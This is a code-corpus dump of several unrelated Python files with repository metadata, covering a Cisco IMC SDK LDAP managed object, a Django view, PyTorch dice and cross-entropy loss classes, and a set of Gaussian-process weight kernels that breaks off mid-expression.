"MIT"
] | null | null | null |
import pickle
mariage = pickle.load(open("/Users/vpl_001/Documents/justinsavoie.github.io/generate_files/mariage_url.txt",'rb'))
preparatifs = pickle.load(open("/Users/vpl_001/Documents/justinsavoie.github.io/generate_files/prep_url.txt",'rb'))
couple_reception = pickle.load(open("/Users/vpl_001/Documents/justinsavoie.github.io/generate_files/couple_reception_url.txt",'rb'))
| 63.166667
| 132
| 0.810026
| 55
| 379
| 5.381818
| 0.381818
| 0.101351
| 0.141892
| 0.192568
| 0.679054
| 0.679054
| 0.679054
| 0.679054
| 0.679054
| 0.679054
| 0
| 0.024523
| 0.031662
| 379
| 5
| 133
| 75.8
| 0.782016
| 0
| 0
| 0
| 1
| 0
| 0.649077
| 0.633245
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5dbbe661ba0b894a17145c19393c2db5be155ae0
| 4,108
|
py
|
Python
|
imcsdk/mometa/ldap/LdapCACertificateManagement.py
|
ragupta-git/ImcSdk
|
2e41f2ffe5282d38de85bc4739fa53dd2f0c9bb4
|
[
"Apache-2.0"
] | null | null | null |
imcsdk/mometa/ldap/LdapCACertificateManagement.py
|
ragupta-git/ImcSdk
|
2e41f2ffe5282d38de85bc4739fa53dd2f0c9bb4
|
[
"Apache-2.0"
] | null | null | null |
imcsdk/mometa/ldap/LdapCACertificateManagement.py
|
ragupta-git/ImcSdk
|
2e41f2ffe5282d38de85bc4739fa53dd2f0c9bb4
|
[
"Apache-2.0"
] | 3
|
2018-11-14T13:02:40.000Z
|
2018-11-14T13:49:38.000Z
|
"""This module contains the general information for LdapCACertificateManagement ManagedObject."""
from ...imcmo import ManagedObject
from ...imccoremeta import MoPropertyMeta, MoMeta
from ...imcmeta import VersionMeta
class LdapCACertificateManagementConsts:
pass
class LdapCACertificateManagement(ManagedObject):
"""This is LdapCACertificateManagement class."""
consts = LdapCACertificateManagementConsts()
naming_props = set([])
mo_meta = {
"classic": MoMeta("LdapCACertificateManagement", "ldapCACertificateManagement", "ldap-ca-cert-mgmt", VersionMeta.Version2013e, "InputOutput", 0x1f, [], ["admin", "user"], [u'aaaLdap'], [u'downloadLdapCACertificate', u'exportLdapCACertificate', u'ldapCACertificate'], ["Get", "Set"]),
"modular": MoMeta("LdapCACertificateManagement", "ldapCACertificateManagement", "ldap-ca-cert-mgmt", VersionMeta.Version2013e, "InputOutput", 0x1f, [], ["admin", "read-only", "user"], [u'aaaLdap'], [u'downloadLdapCACertificate', u'exportLdapCACertificate', u'ldapCACertificate'], ["Get", "Set"])
}
prop_meta = {
"classic": {
"binding_certificate": MoPropertyMeta("binding_certificate", "bindingCertificate", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["Disabled", "Enabled", "disabled", "enabled"], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"description": MoPropertyMeta("description", "description", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
},
"modular": {
"binding_certificate": MoPropertyMeta("binding_certificate", "bindingCertificate", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x2, None, None, None, ["Disabled", "Enabled", "disabled", "enabled"], []),
"dn": MoPropertyMeta("dn", "dn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x4, 0, 255, None, [], []),
"rn": MoPropertyMeta("rn", "rn", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x8, 0, 255, None, [], []),
"status": MoPropertyMeta("status", "status", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_WRITE, 0x10, None, None, None, ["", "created", "deleted", "modified", "removed"], []),
"child_action": MoPropertyMeta("child_action", "childAction", "string", VersionMeta.Version2013e, MoPropertyMeta.INTERNAL, None, None, None, None, [], []),
"description": MoPropertyMeta("description", "description", "string", VersionMeta.Version2013e, MoPropertyMeta.READ_ONLY, None, 0, 510, None, [], []),
},
}
prop_map = {
"classic": {
"bindingCertificate": "binding_certificate",
"dn": "dn",
"rn": "rn",
"status": "status",
"childAction": "child_action",
"description": "description",
},
"modular": {
"bindingCertificate": "binding_certificate",
"dn": "dn",
"rn": "rn",
"status": "status",
"childAction": "child_action",
"description": "description",
},
}
def __init__(self, parent_mo_or_dn, **kwargs):
self._dirty_mask = 0
self.binding_certificate = None
self.status = None
self.child_action = None
self.description = None
ManagedObject.__init__(self, "LdapCACertificateManagement", parent_mo_or_dn, **kwargs)
| 53.350649
| 303
| 0.640944
| 350
| 4,108
| 7.397143
| 0.237143
| 0.124372
| 0.134415
| 0.199305
| 0.776362
| 0.762457
| 0.762457
| 0.762457
| 0.762457
| 0.762457
| 0
| 0.031155
| 0.195229
| 4,108
| 76
| 304
| 54.052632
| 0.751966
| 0.032619
| 0
| 0.509091
| 0
| 0
| 0.282181
| 0.058304
| 0
| 0
| 0.008582
| 0
| 0
| 1
| 0.018182
| false
| 0.018182
| 0.054545
| 0
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5dce42fee1fe89d83e482f80d80e9faf3a04d2b2
| 209
|
py
|
Python
|
main/views.py
|
AthmanZiri/django-site
|
04c6e0967b628b8ebef1ca1caae8cee83c1a2f07
|
[
"MIT"
] | null | null | null |
main/views.py
|
AthmanZiri/django-site
|
04c6e0967b628b8ebef1ca1caae8cee83c1a2f07
|
[
"MIT"
] | null | null | null |
main/views.py
|
AthmanZiri/django-site
|
04c6e0967b628b8ebef1ca1caae8cee83c1a2f07
|
[
"MIT"
] | null | null | null |
from django.shortcuts import render
def index(request):
return render(request, 'index.html', {})
def team(request):
team_sisi ='hello mates!'
return render(request, 'team.html', {'team_sisi': team_sisi})
| 23.222222
| 62
| 0.727273
| 29
| 209
| 5.137931
| 0.482759
| 0.161074
| 0.255034
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.119617
| 209
| 9
| 62
| 23.222222
| 0.809783
| 0
| 0
| 0
| 0
| 0
| 0.190476
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
5dfd2f779579c732f249d12b379fd7f97e5dc830
| 62
|
py
|
Python
|
testing/example_scripts/fixtures/fill_fixtures/test_extend_fixture_conftest_module/conftest.py
|
markshao/pytest
|
611b579d21f7e62b4c8ed54ab70fbfee7c6f5f64
|
[
"MIT"
] | 9,225
|
2015-06-15T21:56:14.000Z
|
2022-03-31T20:47:38.000Z
|
testing/example_scripts/fixtures/fill_fixtures/test_extend_fixture_conftest_module/conftest.py
|
markshao/pytest
|
611b579d21f7e62b4c8ed54ab70fbfee7c6f5f64
|
[
"MIT"
] | 7,794
|
2015-06-15T21:06:34.000Z
|
2022-03-31T10:56:54.000Z
|
testing/example_scripts/fixtures/fill_fixtures/test_extend_fixture_conftest_module/conftest.py
|
markshao/pytest
|
611b579d21f7e62b4c8ed54ab70fbfee7c6f5f64
|
[
"MIT"
] | 2,598
|
2015-06-15T21:42:39.000Z
|
2022-03-29T13:48:22.000Z
|
import pytest
@pytest.fixture
def spam():
return "spam"
| 8.857143
| 17
| 0.677419
| 8
| 62
| 5.25
| 0.75
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.209677
| 62
| 6
| 18
| 10.333333
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0.064516
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 6
|
f8ee0e98bbc856ee44e0a54e56c538317abd446c
| 5,321
|
py
|
Python
|
loss/combine_loss.py
|
shijun18/RS_SEG20
|
0c55f5f3a53cef84d0e907d5662c72a76eaa0413
|
[
"MIT"
] | 4
|
2020-11-15T11:36:13.000Z
|
2021-07-26T07:55:59.000Z
|
loss/combine_loss.py
|
shijun18/RS_SEG20
|
0c55f5f3a53cef84d0e907d5662c72a76eaa0413
|
[
"MIT"
] | null | null | null |
loss/combine_loss.py
|
shijun18/RS_SEG20
|
0c55f5f3a53cef84d0e907d5662c72a76eaa0413
|
[
"MIT"
] | null | null | null |
import torch
import torch.nn as nn
import torch.nn.functional as F
from loss.dice_loss import DiceLoss
from loss.cross_entropy import CrossentropyLoss, TopKLoss
class BCEPlusDice(nn.Module):
"""Dice loss, need one hot encode input
Args:
weight: An array of shape [num_classes,]
ignore_index: class index to ignore
predict: A list of two tensors
target: A list of two tensors
other args pass to BinaryDiceLoss
Return:
combination loss, dice plus bce
"""
def __init__(self, weight=None, ignore_index=None, **kwargs):
super(BCEPlusDice, self).__init__()
self.kwargs = kwargs
self.weight = weight
self.ignore_index = ignore_index
def forward(self, predict, target):
assert isinstance(predict,list)
assert isinstance(target,list)
assert len(predict) == len(target) and len(predict) == 2
dice = DiceLoss(weight=self.weight,ignore_index=self.ignore_index,**self.kwargs)
dice_loss = dice(predict[1],target[1])
bce = nn.BCEWithLogitsLoss(self.weight)
bce_loss = bce(predict[0],target[0])
total_loss = bce_loss + dice_loss
return total_loss
#---------------------------------seg loss---------------------------------
class CEPlusDice(nn.Module):
"""Dice loss, need one hot encode input
Args:
weight: An array of shape [num_classes,]
ignore_index: class index to ignore
predict: A list of two tensors
target: A list of two tensors
other args pass to BinaryDiceLoss
Return:
combination loss, dice plus cross entropy
"""
def __init__(self, weight=None, ignore_index=None, **kwargs):
super(CEPlusDice, self).__init__()
self.kwargs = kwargs
self.weight = weight
self.ignore_index = ignore_index
def forward(self, predict, target):
# print(predict.size())
# print(target.size())
assert predict.size() == target.size()
dice = DiceLoss(weight=self.weight,ignore_index=self.ignore_index,**self.kwargs)
dice_loss = dice(predict,target)
ce = CrossentropyLoss(weight=self.weight)
ce_loss = ce(predict,target)
total_loss = ce_loss + dice_loss
return total_loss
class CEPlusTopkDice(nn.Module):
"""Dice loss, need one hot encode input
Args:
weight: An array of shape [num_classes,]
ignore_index: class index to ignore
predict: A list of two tensors
target: A list of two tensors
other args pass to BinaryDiceLoss
Return:
combination loss, dice plus cross entropy
"""
def __init__(self, weight=None, ignore_index=None, **kwargs):
super(CEPlusTopkDice, self).__init__()
self.kwargs = kwargs
self.weight = weight
self.ignore_index = ignore_index
def forward(self, predict, target):
# print(predict.size())
# print(target.size())
assert predict.size() == target.size()
dice = DiceLoss(weight=self.weight,ignore_index=self.ignore_index,**self.kwargs)
dice_loss = dice(predict,target)
ce = CrossentropyLoss(weight=self.weight)
ce_loss = ce(predict,target)
total_loss = ce_loss + dice_loss
return total_loss
class TopkCEPlusDice(nn.Module):
"""Dice loss, need one hot encode input
Args:
weight: An array of shape [num_classes,]
ignore_index: class index to ignore
predict: A list of two tensors
target: A list of two tensors
other args pass to BinaryDiceLoss
Return:
combination loss, dice plus topk cross entropy
"""
def __init__(self, weight=None, ignore_index=None, **kwargs):
super(TopkCEPlusDice, self).__init__()
self.kwargs = kwargs
self.weight = weight
self.ignore_index = ignore_index
def forward(self, predict, target):
assert predict.size() == target.size()
dice = DiceLoss(weight=self.weight,ignore_index=self.ignore_index,**self.kwargs)
dice_loss = dice(predict,target)
topk = TopKLoss(weight=self.weight,**self.kwargs)
topk_loss = topk(predict,target)
total_loss = topk_loss + dice_loss
return total_loss
class TopkCEPlusTopkDice(nn.Module):
"""Dice loss, need one hot encode input
Args:
weight: An array of shape [num_classes,]
ignore_index: class index to ignore
predict: A list of two tensors
target: A list of two tensors
other args pass to BinaryDiceLoss
Return:
combination loss, dice plus topk cross entropy
"""
def __init__(self, weight=None, ignore_index=None, **kwargs):
super(TopkCEPlusTopkDice, self).__init__()
self.kwargs = kwargs
self.weight = weight
self.ignore_index = ignore_index
def forward(self, predict, target):
assert predict.size() == target.size()
dice = DiceLoss(weight=self.weight,ignore_index=self.ignore_index,**self.kwargs)
dice_loss = dice(predict,target)
topk = TopKLoss(weight=self.weight,k=50)
topk_loss = topk(predict,target)
total_loss = topk_loss + dice_loss
return total_loss
| 32.248485
| 88
| 0.635407
| 656
| 5,321
| 4.990854
| 0.11128
| 0.100794
| 0.021381
| 0.030544
| 0.858277
| 0.858277
| 0.850031
| 0.848503
| 0.848503
| 0.848503
| 0
| 0.001788
| 0.264236
| 5,321
| 165
| 89
| 32.248485
| 0.834483
| 0.302011
| 0
| 0.688312
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.12987
| false
| 0
| 0.064935
| 0
| 0.324675
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
5d23324bebbb96bcd86062de4dbb3f8f58d2f232
| 40
|
py
|
Python
|
bot_facebook/views/__init__.py
|
lariodiniz/BootPlayGame
|
1ba40611eb085e2deaff63a36bdb669b594c7c02
|
[
"MIT"
] | null | null | null |
bot_facebook/views/__init__.py
|
lariodiniz/BootPlayGame
|
1ba40611eb085e2deaff63a36bdb669b594c7c02
|
[
"MIT"
] | null | null | null |
bot_facebook/views/__init__.py
|
lariodiniz/BootPlayGame
|
1ba40611eb085e2deaff63a36bdb669b594c7c02
|
[
"MIT"
] | null | null | null |
from .ativa_bot_view import ativaBotView
| 40
| 40
| 0.9
| 6
| 40
| 5.666667
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.075
| 40
| 1
| 40
| 40
| 0.918919
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
5d679ff2eb030804c21d156f046cdb4330b38397
| 103
|
py
|
Python
|
Python/tests/scripts/test_script_out_param.py
|
tritm78/sqlmlutils
|
9b9ba866bcfbab7a1d0329fcdfad2816bf322d97
|
[
"MIT"
] | 1
|
2020-03-19T18:03:20.000Z
|
2020-03-19T18:03:20.000Z
|
Python/tests/scripts/test_script_out_param.py
|
TheRockStarDBA/sqlmlutils
|
956bdd72638a649f0e613f100fbb81c900dcb65e
|
[
"MIT"
] | null | null | null |
Python/tests/scripts/test_script_out_param.py
|
TheRockStarDBA/sqlmlutils
|
956bdd72638a649f0e613f100fbb81c900dcb65e
|
[
"MIT"
] | null | null | null |
def foo(t1, t2, t3):
return str(t1)+str(t2)
res = foo(t1,t2,t3)
print("Testing output!")
| 12.875
| 27
| 0.563107
| 18
| 103
| 3.222222
| 0.611111
| 0.172414
| 0.241379
| 0.310345
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 0.242718
| 103
| 7
| 28
| 14.714286
| 0.641026
| 0
| 0
| 0
| 0
| 0
| 0.15625
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0
| 0
| 0.25
| 0.5
| 0.25
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
|
0
| 6
|
53b92e8f2a4b67faec233ebac104720d7c490fa1
| 30,998
|
py
|
Python
|
artgpn/weight.py
|
jdavidrcamacho/artgpn
|
69d4dbc5a44b0861331d8d3a5ac5013ebd97bac8
|
[
"MIT"
] | null | null | null |
artgpn/weight.py
|
jdavidrcamacho/artgpn
|
69d4dbc5a44b0861331d8d3a5ac5013ebd97bac8
|
[
"MIT"
] | null | null | null |
artgpn/weight.py
|
jdavidrcamacho/artgpn
|
69d4dbc5a44b0861331d8d3a5ac5013ebd97bac8
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import numpy as np
#because it makes my life easier down the line
pi, exp, sine, cosine, sqrt = np.pi, np.exp, np.sin, np.cos, np.sqrt
class weightFunction(object):
"""
Definition the weight functions kernels of our network.
Kernels not fully implemented yet:
Matern32, and Matern52
"""
def __init__(self, *args):
"""
Puts all kernel arguments in an array pars
"""
self.pars = np.array(args, dtype=float)
def __call__(self, r, t1 = None, t2=None):
"""
r = t - t'
Not sure if this is a good approach since will make our life harder
when defining certain non-stationary kernels, e.g linear kernel.
"""
raise NotImplementedError
def __repr__(self):
"""
Representation of each kernel instance
"""
return "{0}({1})".format(self.__class__.__name__,
", ".join(map(str, self.pars)))
#Not working yet!
# def __minus__(self, b):
# return Minus(self, b)
# def __rminus__(self, b):
# return self.__minus__(b)
#
#
#class _operator(weightFunction):
# """
# To allow operations between two kernels
# """
# def __init__(self, k1):
# self.k1 = k1
#
# @property
# def pars(self):
# return np.append(self.k1.pars)
#
#
#class Minus(_operator):
# """
# To allow a "minus" linear kernel
# """
# def __repr__(self):
# return "-{0}".format(self.k1)
#
# def __call__(self, r):
# return -self.k1(r)
##### Constant #################################################################
class Constant(weightFunction):
"""
This kernel returns its constant argument c
Parameters:
c = constant
"""
def __init__(self, c):
super(Constant, self).__init__(c)
self.c = c
self.type = 'non-stationary and anisotropic'
self.derivatives = 1 #number of derivatives in this kernel
self.params_size = 1 #number of hyperparameters
def __call__(self, r):
return self.c**2 * np.ones_like(r)
class dConstant_dc(Constant):
"""
Log-derivative in order to c
"""
def __init__(self, c):
super(dConstant_dc, self).__init__(c)
self.c = c
def __call__(self, r):
return 2*self.c * np.ones_like(r)
##### White Noise ##############################################################
class WhiteNoise(weightFunction):
"""
Definition of the white noise kernel.
Parameters
wn = white noise amplitude
"""
def __init__(self, wn):
super(WhiteNoise, self).__init__(wn)
self.wn = wn
self.type = 'stationary'
self.derivatives = 1 #number of derivatives in this kernel
self.params_size = 1 #number of hyperparameters
def __call__(self, r):
if r[0,:].shape == r[:,0].shape:
return self.wn**2 * np.diag(np.diag(np.ones_like(r)))
else:
return np.zeros_like(r)
class dWhiteNoise_dwn(WhiteNoise):
"""
Log-derivative in order to the amplitude
"""
def __init__(self, wn):
super(dWhiteNoise_dwn, self).__init__(wn)
self.wn = wn
def __call__(self, r):
return 2 * self.wn**2 * np.diag(np.diag(np.ones_like(r)))
##### Squared exponential ######################################################
class SquaredExponential(weightFunction):
"""
Squared Exponential kernel, also known as radial basis function or RBF
kernel in other works.
Parameters:
weight = weight/amplitude of the kernel
ell = length-scale
"""
def __init__(self, weight, ell):
super(SquaredExponential, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
self.type = 'stationary and anisotropic'
self.derivatives = 2 #number of derivatives in this kernel
self.params_size = 2 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp(-0.5 * r**2 / self.ell**2)
class dSquaredExponential_dweight(SquaredExponential):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell):
super(dSquaredExponential_dweight, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 * exp(-0.5 * r**2 / self.ell**2)
class dSquaredExponential_dell(SquaredExponential):
"""
Log-derivative in order to the ell
"""
def __init__(self, weight, ell):
super(dSquaredExponential_dell, self).__init__(weight, ell)
self.weight = weight
self.ell = ell
def __call__(self, r):
return (r**2 * self.weight**2 / self.ell**2) \
* exp(-0.5 * r**2 / self.ell**2)
##### Periodic #################################################################
class Periodic(weightFunction):
"""
Definition of the periodic kernel.
Parameters:
weight = weight/amplitude of the kernel
ell = lenght scale
P = period
"""
def __init__(self, weight, P, ell):
super(Periodic, self).__init__(weight, P, ell)
self.weight = weight
self.P = P
self.ell = ell
self.type = 'non-stationary and isotropic'
self.derivatives = 3 #number of derivatives in this kernel
self.params_size = 3 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp( -2 * sine(pi*np.abs(r)/self.P)**2 /self.ell**2)
class dPeriodic_dweight(Periodic):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, P, ell):
super(dPeriodic_dweight, self).__init__(weight, P, ell)
self.weight = weight
self.P = P
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 * exp(-2 * sine(pi * np.abs(r) / self.P)**2 \
/ self.ell**2)
class dPeriodic_dell(Periodic):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, P, ell,):
super(dPeriodic_dell, self).__init__(weight, P, ell)
self.weight = weight
self.P = P
self.ell = ell
def __call__(self, r):
return (4* self.weight**2 * sine(pi * np.abs(r) / self.P)**2 \
*exp(-2 * sine(pi * np.abs(r) / self.P)**2 \
/ self.ell**2)) / self.ell**2
class dPeriodic_dP(Periodic):
"""
Log-derivative in order to P
"""
def __init__(self, weight, ell, P):
super(dPeriodic_dP, self).__init__(weight, P, ell)
self.weight = weight
self.P = P
self.ell = ell
def __call__(self, r):
return (4 * pi * r * self.weight**2 \
* cosine(pi*np.abs(r) / self.P) *sine(pi*np.abs(r) / self.P) \
* exp(-2 * sine(pi*np.abs(r) / self.P)**2 / self.ell**2)) \
/ (self.ell**2 * self.P)
##### Quasi Periodic ###########################################################
class QuasiPeriodic(weightFunction):
"""
This kernel is the product between the exponential sine squared kernel
and the squared exponential kernel, commonly known as the quasi-periodic
kernel.
Parameters:
weight = weight/amplitude of the kernel
ell_e = evolutionary time scale
ell_p = length scale of the Periodic component
P = kernel Periodicity
"""
def __init__(self, weight, ell_e, P, ell_p):
super(QuasiPeriodic, self).__init__(weight, ell_e, P, ell_p)
self.weight = weight
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
self.type = 'non-stationary and anisotropic'
self.derivatives = 4 #number of derivatives in this kernel
self.params_size = 4 #number of hyperparameters
def __call__(self, r):
return self.weight**2 *exp(- 2*sine(pi*np.abs(r)/self.P)**2 \
/self.ell_p**2 - r**2/(2*self.ell_e**2))
class dQuasiPeriodic_dweight(Periodic):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, ell_e, P, ell_p):
super(dQuasiPeriodic_dweight, self).__init__(weight, ell_e, P, ell_p)
self.weight = weight
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call(self, r):
return 2 * self.weight**2 *exp(-2 * sine(pi*np.abs(r)/self.P)**2 \
/self.ell_p**2 - r**2/(2*self.ell_e**2))
class dQuasiPeriodic_delle(QuasiPeriodic):
"""
Log-derivative in order to ell_e
"""
def __init__(self, weight, ell_e, P, ell_p):
super(dQuasiPeriodic_delle, self).__init__(weight, ell_e, P, ell_p)
self.weight = weight
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call(self, r):
return (r**2 * self.weight**2 / self.ell_e**2) \
*exp(-2 * sine(pi*np.abs(r)/self.P)**2 \
/self.ell_p**2 - r**2/(2*self.ell_e**2))
class dQuasiPeriodic_dP(QuasiPeriodic):
"""
Log-derivative in order to P
"""
def __init__(self, weight, ell_e, P, ell_p):
super(dQuasiPeriodic_dP, self).__init__(weight, ell_e, P, ell_p)
self.weight = weight
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call(self, r):
return 4 * pi * r * self.weight**2 \
* cosine(pi*np.abs(r)/self.P) * sine(pi*np.abs(r)/self.P) \
* exp(-2 * sine(pi * np.abs(r)/self.P)**2 \
/self.ell_p**2 - r**2/(2*self.ell_e**2)) \
/ (self.ell_p**2 * self.P)
class dQuasiPeriodic_dellp(QuasiPeriodic):
"""
Log-derivative in order to ell_p
"""
def __init__(self, weight, ell_e, P, ell_p):
super(dQuasiPeriodic_dellp, self).__init__(weight, ell_e, P, ell_p)
self.weight = weight
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call(self, r):
return 4 * self.weight**2 * sine(pi*r/self.P)**2 \
* exp(-2 * sine(pi*np.abs(r)/self.P)**2 \
/self.ell_p**2 - r**2/(2*self.ell_e**2)) / self.ell_p**2
##### Rational Quadratic #######################################################
class RationalQuadratic(weightFunction):
"""
Definition of the rational quadratic kernel.
Parameters:
weight = weight/amplitude of the kernel
alpha = weight of large and small scale variations
ell = characteristic lenght scale to define the kernel "smoothness"
"""
def __init__(self, weight, alpha, ell):
super(RationalQuadratic, self).__init__(weight, alpha, ell)
self.weight = weight
self.alpha = alpha
self.ell = ell
self.type = 'stationary and anisotropic'
self.derivatives = 3 #number of derivatives in this kernel
self.params_size = 3 #number of hyperparameters
def __call__(self, r):
return self.weight**2 / (1+ r**2/ (2*self.alpha*self.ell**2))**self.alpha
class dRationalQuadratic_dweight(RationalQuadratic):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, alpha, ell):
super(dRationalQuadratic_dweight, self).__init__(weight, alpha, ell)
self.weight = weight
self.alpha = alpha
self.ell = ell
def __call__(self, r):
return 2 * self.weight**2 \
/ (1+ r**2/ (2*self.alpha*self.ell**2))**self.alpha
class dRationalQuadratic_dalpha(RationalQuadratic):
"""
Log-derivative in order to alpha
"""
def __init__(self, weight, alpha, ell):
super(dRationalQuadratic_dalpha, self).__init__(weight, alpha, ell)
self.weight = weight
self.alpha = alpha
self.ell = ell
def __call(self, r):
return ((r**2/(2*self.alpha*self.ell**2*(r**2/(2*self.alpha*self.ell**2)+1))\
- np.log(r**2/(2*self.alpha*self.ell**2)+1)) \
* self.weight**2 * self.alpha) \
/ (1+r**2/(2*self.alpha*self.ell**2))**self.alpha
class dRationalQuadratic_dell(RationalQuadratic):
"""
Log-derivative in order to ell
"""
def __init__(self, weight, alpha, ell):
super(dRationalQuadratic_dell, self).__init__(weight, alpha, ell)
self.weight = weight
self.alpha = alpha
self.ell = ell
def __call(self, r):
return r**2 * (1+r**2/(2*self.alpha*self.ell**2))**(-1-self.alpha) \
* self.weight**2 / self.ell**2
##### RQP kernel ###############################################################
class RQP(weightFunction):
"""
Definition of the product between the exponential sine squared kernel
and the rational quadratic kernel that we called RQP kernel.
If I am thinking this correctly then this kernel should tend to the
QuasiPeriodic kernel as alpha increases, although I am not sure if we can
say that it tends to the QuasiPeriodic kernel as alpha tends to infinity.
Parameters:
weight = weight/amplitude of the kernel
ell_e and ell_p = aperiodic and periodic lenght scales
alpha = alpha of the rational quadratic kernel
P = periodic repetitions of the kernel
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(RQP, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
self.type = 'non-stationary and anisotropic'
self.derivatives = 5 #number of derivatives in this kernel
self.params_size = 5 #number of hyperparameters
def __call__(self, r):
return self.weight**2 * exp(- 2*sine(pi*np.abs(r)/self.P)**2 \
/ self.ell_p**2) \
/(1+ r**2/ (2*self.alpha*self.ell_e**2))**self.alpha
class dRQP_dweight(RQP):
"""
Log-derivative in order to the weight
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(dRQP_dweight, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call(self, r):
return 2 * self.weight**2 * exp(- 2*sine(pi*np.abs(r)/self.P)**2 \
/ self.ell_p**2) \
/(1+ r**2/ (2*self.alpha*self.ell_e**2))**self.alpha
class dRQP_dalpha(RQP):
"""
Log-derivative in order to alpha
"""
def __init__(self, weight, alpha, ell_e, P, ell_p):
super(dRQP_dalpha, self).__init__(weight, alpha, ell_e, P, ell_p)
self.weight = weight
self.alpha = alpha
self.ell_e = ell_e
self.P = P
self.ell_p = ell_p
def __call__(self, r):
return self.alpha * ((r**2 / (2*self.alpha \
*self.ell_e**2*(r**2/(2*self.alpha*self.ell_e**2)+1)) \
